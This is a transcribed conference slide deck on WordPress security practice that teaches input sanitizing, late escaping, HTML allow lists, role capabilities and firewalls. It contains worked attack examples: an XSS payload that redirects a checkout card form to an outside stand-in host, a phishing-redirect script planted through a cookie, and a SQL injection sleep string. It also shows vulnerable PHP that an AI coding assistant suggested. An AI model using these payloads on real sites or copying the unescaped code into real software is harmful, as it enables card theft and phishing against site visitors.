Upgrade to PRO for Only $50/Year—Limited-Time Offer! 🔥

WordCamp Sydney: The Enterprise Approach to Wor...

Peter Wilson
November 25, 2024
Programming
0
8

WordCamp Sydney: The Enterprise Approach to WordPress Security.

When developing themes and plugins for WordPress, it’s inevitable that you’ll get a report of a security flaw, or worse, that one of your clients’ sites has been hacked. Right? Well, not quite.

In this session you’ll learn about the approaches enterprise agencies use to prevent a panicked phone call from a client reporting a flaw. Learn why the White’s Local Family Business site gets hacked but the White House does not.

Just as there’s no one plugin that will make a site secure, there’s no one trick to prevent it either. This session will help you understand the holistic approach required to keep your client’s sites secure.

Peter Wilson

November 25, 2024
Tweet

More Decks by Peter Wilson

See All by Peter Wilson
LoopConf - Burn it down: A case study in CMS replatforming
peterwilsoncc
0
750
wp_post_insert(): how, what, why?
peterwilsoncc
1
450
Yow West - Performance: The path to HTTP/2 is Full of Potholes
peterwilsoncc
0
150
WordCamp Ubud: Performance - Moving to HTTP2
peterwilsoncc
0
290
WordCamp Auckland: I'm an imposter because...
peterwilsoncc
0
490
WordCamp Sydney: Contributing to WordPress Core
peterwilsoncc
1
190
WordCamp SG: Contributing to WordPress Core
peterwilsoncc
0
400
WCEU: Seven Times Faster : A Study in frontend Optimization
peterwilsoncc
4
700
Web Directions Respond: Performance: HTTP2 in a 1.5 world
peterwilsoncc
1
1.2k

Other Decks in Programming

See All in Programming
Micro Frontends Unmasked Opportunities, Challenges, Alternatives
manfredsteyer
PRO
0
150
2024/11/8 関西Kaggler会 2024 #3 / Kaggle Kernel で Gemma 2 × vLLM を動かす。
kohecchi
5
1k
Functional Event Sourcing using Sekiban
tomohisa
0
120
WebAssembly Unleashed: Powering Server-Side Applications
chrisft25
0
1.7k
見せてあげますよ、「本物のLaravel批判」ってやつを。
77web
7
7.9k
受け取る人から提供する人になるということ
little_rubyist
0
270
Swift Testing - iPlayground
chiaoteni
0
120
Creating a Free Video Ad Network on the Edge
mizoguchicoji
0
140
3 Effective Rules for Using Signals in Angular
manfredsteyer
PRO
0
150
cmp.Or に感動した
otakakot
3
310
聞き手から登壇者へ: RubyKaigi2024 LTでの初挑戦が 教えてくれた、可能性の星
mikik0
1
140
新規学習のハードルを下げる方法とは?/ How to Make Learning Something New Easier?
nobuoooo
1
110

Featured

See All Featured
Done Done
chrislema
181
16k
Side Projects
sachag
452
42k
Rebuilding a faster, lazier Slack
samanthasiow
79
8.7k
Building Flexible Design Systems
yeseniaperezcruz
327
38k
RailsConf 2023
tenderlove
29
910
Being A Developer After 40
akosma
87
590k
Teambox: Starting and Learning
jrom
133
8.8k
Music & Morning Musume
bryan
46
6.2k
Facilitating Awesome Meetings
lara
50
6.1k
BBQ
matthewcrist
85
9.3k
Git: the NoSQL Database
bkeepers
PRO
427
64k
Speed Design
sergeychernyshev
25
630

Transcript

  1. The Enterprise Approach to WordPress Security.

  2. None
  3. None
  4. None

  5. Body Level One Body Level Two Body Level Three 10up

    @10up Feb 11, 2021 Excited and honored to share our part in launching the new White House website (powered by #WordPress) and to be highlighted by @FastCompany as the WhiteHouse.gov development partner: 10up.com/blog/2021/10up…
  6. None
  7. None
  8. None
  9. None

  10. © Christoph Scholz, 2016 • Hacker IT Computer Security •

    flic.kr/p/HUTQEu •

  11. © Sheri Bigelow, 2015 • 2015 WordPress Community Summit •

    flic.kr/p/BKTjfm •

  12. © Sheri Bigelow, 2015 • 2015 WordPress Community Summit •

    flic.kr/p/BKTjfm • Not actually Hackers (WordPress Core Contributors)
  13. None

  14. <meta name=“generator" content="WordPress 6.5.x” />

  15. <meta name=“generator" content="WordPress 6.5.x” />

  16. © Andy Rogers, 2012 • Server Room • flic.kr/p/d5WcJs •

  17. Why do sites get hacked?

  18. People don’t know what they don’t know

  19. Popular Plugin Developer Resources <?php $user_id = get_the_author_meta('ID'); $pet =

    get_user_meta( $user_id, 'pet', true ); ?> <img src="<?php echo $pet['url']; ?>" alt="<?php echo $pet['alt']; ?>" />

  20. Popular Plugin Developer Resources <?php $user_id = get_the_author_meta('ID'); $cat =

    get_user_meta( $user_id, 'cat', true ); ?> <img src="<?php echo $cat['url']; ?>" alt="<?php echo $cat['alt']; ?>" />

  21. Popular Plugin Developer Resources <?php $user_id = get_the_author_meta('ID'); $cat =

    get_user_meta( $user_id, 'cat', true ); ?> <img src="<?php echo $cat['url']; ?>" alt="<?php echo $cat['alt']; ?>" />

  22. Untrustworthy input

  23. This week only! We’ve got a special on Pears, available

    to our Twitter followers only. http://green-family-grocer.local/fruit-and... Green Family Grocers @green_family_grocers 25 August 2023
  24. None

  25. /* * Use a query string parameter to set a

    cookie * * On all pages of the site, check if the query string * parameter `gfg_discount_code` is set. * If so, set a cookie named `gfg_discount_code` with the * value of the `gfg_discount_code` parameter. * * The cookie should expire in 10 years time. */ if ( isset( $_GET['gfg_discount_code'] ) ) {

  26. if ( isset( $_GET['gfg_discount_code'] ) ) { // Delete cookie

    if the value is falsey if ( ! $_GET['gfg_discount_code'] ) { setcookie( 'gfg_discount_code', '', time() - 3600, '/' ); } else { // Set a cookie with the value of the parameter. setcookie( 'gfg_discount_code', wp_unslash( $_GET['gfg_discount_code'] ), time() + ( 10 * YEAR_IN_SECONDS ), '/' ); } } GitHub Copilot

  27. People don’t know what they don’t know

  28. People don’t know what they don’t know Natural language models

    learn from people

  29. // Check if the discount code is set. if (

    gfg_get_discount_code() ) { // If it is, display a custom message. ?> <div <?php echo get_block_wrapper_attributes(); ?>> <p>Discount code applied!</p> <span class="gfc-discount-code"> <?php echo gfg_get_discount_code(); ?> </span> </div> <?php } GitHub Copilot

  30. This week only! We’ve got a special on Pears, available

    to our Twitter followers only. http://green-family-grocer.local/fruit-and... Green Family Grocers @green_family_grocers 25 August 2023

  31. This week only! We’ve got a special on Pairs, available

    to our Twitter followers only. http://green-family-grocer.local/fruit-and... Green Family Grocers @SCARLETT_FAMILY_GROCERS 25 August 2023
  32. None

  33. https://green-family-grocer.local/fruit-and-veg/pears/? gfg_discount_code=WCSyd%3Cscript%3E%20%20wind ow.onload%20=%20() %20=%3E%20%7B%20%20%20const%20el%20=%20 document.getElementById(%20%27gfc-credit-card- form%27%20);%20%20%20if%20(el) %20%7B%20%20%20%20el.setAttribute(%20%27actio n%27,%20%27https://scarlett-family-grocer.local/ checkout/thank-you/%27); %20%20%20%7D%20%20%7D%20%20%3C/

    script%3E

  34. WCSyd <script> window.onload = () => { const el =

    document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https://scarlett-family-grocer.local/checkout/thank-you/' ); } } </script>

  35. WCSyd <script> window.onload = () => { const el =

    document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https://scarlett-family-grocer.local/checkout/thank-you/' ); } } </script>

  36. WCSyd <script> window.onload = () => { const el =

    document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https://scarlett-family-grocer.local/checkout/thank-you/' ); } } </script>

  37. // Check if the discount code is set. if (

    gfg_get_discount_code() ) { // If it is, display a custom message. ?> <div <?php echo get_block_wrapper_attributes(); ?>> <p>Discount code applied!</p> <span class="gfc-discount-code"> <?php echo gfg_get_discount_code(); ?> </span> </div> <?php } GitHub Copilot

  38. eck if the discount code is set. gfg_get_discount_code() ) {

    / If it is, display a custom message. > div <?php echo get_block_wrapper_attributes(); ?>> <p>Discount code applied!</p> <span class="gfc-discount-code"> <?php echo gfg_get_discount_code(); ?> </span> /div> ?php

  39. Always Escape late It is best to do the output

    escaping as late as possible, ideally as data is being outputted. developer.wordpress.org/apis/security/escaping

  40. eck if the discount code is set. gfg_get_discount_code() ) {

    / If it is, display a custom message. > div <?php echo get_block_wrapper_attributes(); ?>> <p>Discount code applied!</p> <span class="gfc-discount-code"> <?php echo gfg_get_discount_code(); ?> </span> /div> ?php <?php echo esc_html( gfg_get_discount_code() ); ?>

  41. Discount code applied! WCSyd<script> window.onload = () => { const

    el = document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https:"//scarlett-family- grocer.local/checkout/thank-you/'); } } </script>

  42. WCSyd <script> window.onload = () => { const el =

    document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https://scarlett-family-grocer.local/checkout/thank-you/' ); } } </script>

  43. $discount_code = sanitize_text_field( wp_unslash( $_GET['gfg_discount_code'] ) ); // Delete cookie

    if the value is falsey if ( ! $discount_code ) { setcookie( 'gfg_discount_code', '', time() - 3600, '/' ); } else { // Set a cookie with the value of the parameter. setcookie( 'gfg_discount_code', $discount_code, time() + ( 10 * YEAR_IN_SECONDS ), '/' ); }

  44. Always Sanitize Input Remember: Even admins are users, and users

    will enter incorrect data, either on purpose or accidentally. It’s your job to protect them from themselves. developer.wordpress.org/apis/security/sanitizing/

  45. Discount code applied! WCSyd

  46. When is data untrustworthy?

  47. All form data is untrustworthy Even hidden fields and JavaScript

    validated data

  48. All form data is untrustworthy Even hidden fields and JavaScript

    validated data

  49. All form data is untrustworthy Even hidden fields and JavaScript

    validated data Discount code applied! WCSyd<script> window.onload = () => { const el = document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https:"//scarlett-family- grocer.local/checkout/thank-you/'); } } </script>

  50. Discount code applied! WCSyd<script> window.onload = () => { const

    el = document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https:"//scarlett-family- grocer.local/checkout/thank-you/'); } } </script>

  51. Discount code applied! WCSyd<script> window.onload = () => { const

    el = document.getElementById( 'gfc-credit-card-form' ); if (el) { el.setAttribute( 'action', 'https:"//scarlett-family- grocer.local/checkout/thank-you/'); } } </script>

  52. $discount_code = sanitize_text_field( wp_unslash( $_GET['gfg_discount_code'] ) ); // Delete cookie

    if the value is falsey if ( ! $discount_code ) { setcookie( 'gfg_discount_code', '', time() - 3600, '/' ); } else { // Set a cookie with the value of the parameter. setcookie( 'gfg_discount_code', $discount_code, time() + ( 10 * YEAR_IN_SECONDS ), '/' ); }

  53. Cookies are user data!

  54. HTTP headers are user data!

  55. Session and local storage values are user data!

  56. Everything that comes from the browser is untrustworthy

  57. You’d have a go, right?! (By the way, if my

    manager is in the room — I didn’t really leave my computer open for house keeping)

  58. Discount code applied! WCSyd<script>location.href="https://my- phishing-site.com"</script>

  59. nasty = document.createElement( 'script' ); nasty.src="/wp-includes/js/utils.js?ver=6.3" document.documentElement.insertBefore( nasty, document.body );

    wpCookies.set( 'gfg_discount_code', 'WCSyd<script>location.href="https://my-phishing- site.com"</script>', 10000000, '/' );

  60. // If the cookie `gfg_discount_code` is set, return that value.

    if ( isset( $_COOKIE['gfg_discount_code'] ) ) { $discount_code = sanitize_text_field( wp_unslash( $_COOKIE['gfg_discount_code'] ) ); $unsanitized_code = wp_unslash( $_COOKIE['gfg_discount_code'] ); // Clear discount code if the values differ. if ( $discount_code !== $unsanitized_code ) { setcookie( 'gfg_discount_code', '', time() - 3600, '/' ); return false; } return $discount_code; }

  61. // If the cookie `gfg_discount_code` is set, return that value.

    if ( isset( $_COOKIE['gfg_discount_code'] ) ) { $discount_code = sanitize_text_field( wp_unslash( $_COOKIE['gfg_discount_code'] ) ); $unsanitized_code = wp_unslash( $_COOKIE['gfg_discount_code'] ); // Clear discount code if the values differ. if ( $discount_code !== $unsanitized_code ) { setcookie( 'gfg_discount_code', '', time() - 3600, '/' ); return false; } return $discount_code; }

  62. Escaping and Sanitization is really, really nuanced

  63. Google: wordpress common apis sanitization wordpress common apis escaping

  64. // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized $user_input = wp_unslash( $_POST['user_input'] ); // Check

    the user input is valid: if ( ! valid_input( $user_input ) ) { return false; } // Do something with the user input.

  65. // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized $user_input = wp_unslash( $_POST['user_input'] ); // Check

    the user input is valid: if ( ! valid_input( $user_input ) ) { return false; } // Do something with the user input.

  66. Don’t offload your responsibilities to software

  67. HTML Allow List

  68. None

  69. Lower privileged users are limited to a sub-set of HTML

  70. 'address' => array(), 'a' => array( 'href' => true, 'rel'

    => true, 'rev' => true, 'name' => true, 'target' => true, 'download' => array( 'valueless' => 'y', ), ), 'abbr' => array(), 'acronym' => array(), 'area' => array( 'alt' => true, 'coords' => true, 'href' => true, 'nohref' => true, 'shape' => true, 'target' => true, ), 'article' => array( 'align' => true, ), 'aside' => array( 'align' => true, ), 'audio' => array( 'autoplay' => true, 'controls' => true, 'loop' => true, 'muted' => true, 'preload' => true, 'src' => true, ), 'b' => array(), 'bdo' => array(), 'big' => array(), 'blockquote' => array( 'cite' => true, ), 'br' => array(), 'button' => array( 'disabled' => true, 'name' => true, 'type' => true, 'value' => true, ), 'caption' => array( 'align' => true, ), 'cite' => array(), 'code' => array(), 'col' => array( 'align' => true, 'char' => true, 'charoff' => true, 'span' => true, 'valign' => true, 'width' => true, ), 'colgroup' => array( 'align' => true, 'char' => true, 'charoff' => true, 'span' => true, 'valign' => true, 'width' => true, ), 'del' => array( 'datetime' => true, ), 'dd' => array(), 'dfn' => array(), 'details' => array( 'align' => true, 'open' => true, ), 'div' => array( 'align' => true, ), 'dl' => array(), 'dt' => array(), 'em' => array(), 'fieldset' => array(), 'figure' => array( 'align' => true, ), 'figcaption' => array( 'align' => true, ), 'font' => array( 'color' => true, 'face' => true, 'size' => true, ), 'footer' => array( 'align' => true, ), 'h1' => array( 'align' => true, ), 'h2' => array( 'align' => true, ), 'h3' => array( 'align' => true, ), 'h4' => array( 'align' => true, ), 'h5' => array( 'align' => true, ), 'h6' => array( 'align' => true, ), 'header' => array( 'align' => true, ), 'hgroup' => array( 'align' => true, ), 'hr' => array( 'align' => true, 'noshade' => true, 'size' => true, 'width' => true, ), 'i' => array(), 'img' => array( 'alt' => true, 'align' => true, 'border' => true, 'height' => true, 'hspace' => true, 'loading' => true, 'longdesc' => true, 'vspace' => true, 'src' => true, 'usemap' => true, 'width' => true, ), 'ins' => array( 'datetime' => true, 'cite' => true, ), 'kbd' => array(), 'label' => array( 'for' => true, ), 'legend' => array( 'align' => true, ), 'li' => array( 'align' => true, 'value' => true, ), 'main' => array( 'align' => true, ), 'map' => array( 'name' => true, ), 'mark' => array(), 'menu' => array( 'type' => true, ), 'nav' => array( 'align' => true, ), 'object' => array( 'data' => array( 'required' => true, 'value_callback' => '_wp_kses_allow_pdf_objects', ), 'type' => array( 'required' => true, 'values' => array( 'application/pdf' ), ), ), 'p' => array( 'align' => true, ), 'pre' => array( 'width' => true, ), 'q' => array( 'cite' => true, ), 'rb' => array(), 'rp' => array(), 'rt' => array(), 'rtc' => array(), 'ruby' => array(), 's' => array(), 'samp' => array(), 'span' => array( 'align' => true, ), 'section' => array( 'align' => true, ), 'small' => array(), 'strike' => array(), 'strong' => array(), 'sub' => array(), 'summary' => array( 'align' => true, ), 'sup' => array(), 'table' => array( 'align' => true, 'bgcolor' => true, 'border' => true, 'cellpadding' => true, 'cellspacing' => true, 'rules' => true, 'summary' => true, 'width' => true, ), 'tbody' => array( 'align' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'td' => array( 'abbr' => true, 'align' => true, 'axis' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'colspan' => true, 'headers' => true, 'height' => true, 'nowrap' => true, 'rowspan' => true, 'scope' => true, 'valign' => true, 'width' => true, ), 'textarea' => array( 'cols' => true, 'rows' => true, 'disabled' => true, 'name' => true, 'readonly' => true, ), 'tfoot' => array( 'align' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'th' => array( 'abbr' => true, 'align' => true, 'axis' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'colspan' => true, 'headers' => true, 'height' => true, 'nowrap' => true, 'rowspan' => true, 'scope' => true, 'valign' => true, 'width' => true, ), 'thead' => array( 'align' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'title' => array(), 'tr' => array( 'align' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'track' => array( 'default' => true, 'kind' => true, 'label' => true, 'src' => true, 'srclang' => true, ), 'tt' => array(), 'u' => array(), 'ul' => array( 'type' => true, ), 'ol' => array( 'start' => true, 'type' => true, 'reversed' => true, ), 'var' => array(), 'video' => array( 'autoplay' => true, 'controls' => true, 'height' => true, 'loop' => true, 'muted' => true, 'playsinline' => true, 'poster' => true, 'preload' => true, 'src' => true, 'width' => true, ), $allowedposttags = array( );
  71. None

  72. define( 'DISALLOW_UNFILTERED_HTML', true );

  73. define( 'DISALLOW_UNFILTERED_HTML', true );

  74. None
  75. None

  76. 'address' => array(), 'a' => array( 'href' => true, 'rel'

    => true, 'rev' => true, 'name' => true, 'target' => true, 'download' => array( 'valueless' => 'y', ), ), 'abbr' => array(), 'acronym' => array(), 'area' => array( 'alt' => true, 'coords' => true, 'href' => true, 'nohref' => true, 'shape' => true, 'target' => true, ), 'article' => array( 'align' => true, ), 'aside' => array( 'align' => true, ), 'audio' => array( 'autoplay' => true, 'controls' => true, 'loop' => true, 'muted' => true, 'preload' => true, 'src' => true, ), 'b' => array(), 'bdo' => array(), 'big' => array(), 'blockquote' => array( 'cite' => true, ), 'br' => array(), 'button' => array( 'disabled' => true, 'name' => true, 'type' => true, 'value' => true, ), 'caption' => array( 'align' => true, ), 'cite' => array(), 'code' => array(), 'col' => array( 'align' => true, 'char' => true, 'charoff' => true, 'span' => true, 'valign' => true, 'width' => true, ), 'colgroup' => array( 'align' => true, 'char' => true, 'charoff' => true, 'span' => true, 'valign' => true, 'width' => true, ), 'del' => array( 'datetime' => true, ), 'dd' => array(), 'dfn' => array(), 'details' => array( 'align' => true, 'open' => true, ), 'div' => array( 'align' => true, ), 'dl' => array(), 'dt' => array(), 'em' => array(), 'fieldset' => array(), 'figure' => array( 'align' => true, ), 'figcaption' => array( 'align' => true, ), 'font' => array( 'color' => true, 'face' => true, 'size' => true, ), 'footer' => array( 'align' => true, ), 'h1' => array( 'align' => true, ), 'h2' => array( 'align' => true, ), 'h3' => array( 'align' => true, ), 'h4' => array( 'align' => true, ), 'h5' => array( 'align' => true, ), 'h6' => array( 'align' => true, ), 'header' => array( 'align' => true, ), 'hgroup' => array( 'align' => true, ), 'hr' => array( 'align' => true, 'noshade' => true, 'size' => true, 'width' => true, ), 'i' => array(), 'img' => array( 'alt' => true, 'align' => true, 'border' => true, 'height' => true, 'hspace' => true, 'loading' => true, 'longdesc' => true, 'vspace' => true, 'src' => true, 'usemap' => true, 'width' => true, ), 'ins' => array( 'datetime' => true, 'cite' => true, ), 'kbd' => array(), 'label' => array( 'for' => true, ), 'legend' => array( 'align' => true, ), 'li' => array( 'align' => true, 'value' => true, ), 'main' => array( 'align' => true, ), 'map' => array( 'name' => true, ), 'mark' => array(), 'menu' => array( 'type' => true, ), 'nav' => array( 'align' => true, ), 'object' => array( 'data' => array( 'required' => true, 'value_callback' => '_wp_kses_allow_pdf_objects', ), 'type' => array( 'required' => true, 'values' => array( 'application/pdf' ), ), ), 'p' => array( 'align' => true, ), 'pre' => array( 'width' => true, ), 'q' => array( 'cite' => true, ), 'rb' => array(), 'rp' => array(), 'rt' => array(), 'rtc' => array(), 'ruby' => array(), 's' => array(), 'samp' => array(), 'span' => array( 'align' => true, ), 'section' => array( 'align' => true, ), 'small' => array(), 'strike' => array(), 'strong' => array(), 'sub' => array(), 'summary' => array( 'align' => true, ), 'sup' => array(), 'table' => array( 'align' => true, 'bgcolor' => true, 'border' => true, 'cellpadding' => true, 'cellspacing' => true, 'rules' => true, 'summary' => true, 'width' => true, ), 'tbody' => array( 'align' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'td' => array( 'abbr' => true, 'align' => true, 'axis' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'colspan' => true, 'headers' => true, 'height' => true, 'nowrap' => true, 'rowspan' => true, 'scope' => true, 'valign' => true, 'width' => true, ), 'textarea' => array( 'cols' => true, 'rows' => true, 'disabled' => true, 'name' => true, 'readonly' => true, ), 'tfoot' => array( 'align' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'th' => array( 'abbr' => true, 'align' => true, 'axis' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'colspan' => true, 'headers' => true, 'height' => true, 'nowrap' => true, 'rowspan' => true, 'scope' => true, 'valign' => true, 'width' => true, ), 'thead' => array( 'align' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'title' => array(), 'tr' => array( 'align' => true, 'bgcolor' => true, 'char' => true, 'charoff' => true, 'valign' => true, ), 'track' => array( 'default' => true, 'kind' => true, 'label' => true, 'src' => true, 'srclang' => true, ), 'tt' => array(), 'u' => array(), 'ul' => array( 'type' => true, ), 'ol' => array( 'start' => true, 'type' => true, 'reversed' => true, ), 'var' => array(), 'video' => array( 'autoplay' => true, 'controls' => true, 'height' => true, 'loop' => true, 'muted' => true, 'playsinline' => true, 'poster' => true, 'preload' => true, 'src' => true, 'width' => true, ), $allowedposttags = array( );

  77. Allowed HTML tags • Links • Block quotes • Bold

    • Italics • Headings • Lists • Paragraphs and line breaks

  78. Taylor Swift — Look What You Made Me Do “I

    don't trust nobody & nobody trusts me”

  79. Taylor Swift — Look What You Made Me Do “I

    don't trust nobody & nobody trusts me”
  80. None

  81. Aside on
 job security Presume Test Content Is Public

  82. Aside on
 job security Lorem ipsum dolor sit amet, consectetur

    adipiscing elit

  83. Aside on
 job security Swearem ipsum Automatic el desarrollador de

    Wordpress

  84. Permissions

  85. WordPress Roles • High privileged • Super admin (multisite only)

    • Administrator • Editor • Low privileged • Author • Contributor • No privileged • Subscriber

  86. Capabilities

  87. None
  88. None
  89. None

  90. foreach ( $editor_caps as $editor_cap => $permission ) { if

    ( ! str_ends_with( $editor_cap, '_posts' ) && ! str_ends_with( $editor_cap, '_pages' ) ) { continue; } $new_cap = substr( $editor_cap, 0, -5 ) . 'presidential_' . substr( $editor_cap, -5 ); $presidential_editor_caps[ $new_cap ] = $permission; } /* Add the new WHGov Presidential Editor role. */

  91. function meta_caps_posts( $caps, $cap, $user_id, $args ) { if (

    in_array( 'do_not_allow', $caps, true ) || ! str_ends_with( $cap, '_post' ) ) { // Irrelevant cap or cap is explicitly denied. return $caps; } $post_is_presidential = true; /* ... but more */ if ( ! $post_is_presidential ) { return $caps; } foreach ( $caps as $required_cap ) { if ( ! str_ends_with( $required_cap, '_posts' ) && ! str_ends_with( $required_cap, '_pages' )

  92. return $caps; } foreach ( $caps as $required_cap ) {

    if ( ! str_ends_with( $required_cap, '_posts' ) && ! str_ends_with( $required_cap, '_pages' ) ) { continue; } $caps[] = substr( $required_cap, 0, -5 ) . 'presidential_' . substr( $required_cap, -5 ); } return $caps; } add_filter( 'map_meta_cap', __NAMESPACE__ . '\\meta_caps_posts', 10,
  93. None

  94. Hosting

  95. Who’s the best host if you want … ?

  96. Who’s the best host if you want to keep your

    site secure?

  97. Who’s the best host if you want to keep your

    site secure?

  98. No

  99. $ dig 10up.com ;; ANSWER SECTION: 10up.com. 300 IN A

    104.24.183.3 10up.com. 300 IN A 172.67.82.235 10up.com. 300 IN A 104.24.182.3 ;; Query time: 68 msec ;; SERVER: 192.168.128.1#53(192.168.128.1) ;; WHEN: Thu Aug 17 12:11:03 EDT 2023 ;; MSG SIZE rcvd: 85
  100. None

  101. MSIE 6.0" OR 1 = (SELECT sleep(10)); -- ...

  102. MSIE 6.0" OR 1 = (SELECT sleep(10)); -- ...

  103. None
  104. None
  105. None
  106. None

  107. Web Application Firewalls

  108. © David Howard, 2015 • no entry • flic.kr/p/GHJRZy •

  109. Never expose your WordPress Servers IP address to the internet

  110. The one simple trick…

  111. …is that it’s not simple.

  112. None

  113. © Kristina Kuncevich, 2013 • Sleep • flic.kr/p/fvNQYZ •

  114. I’ve made a huge mistake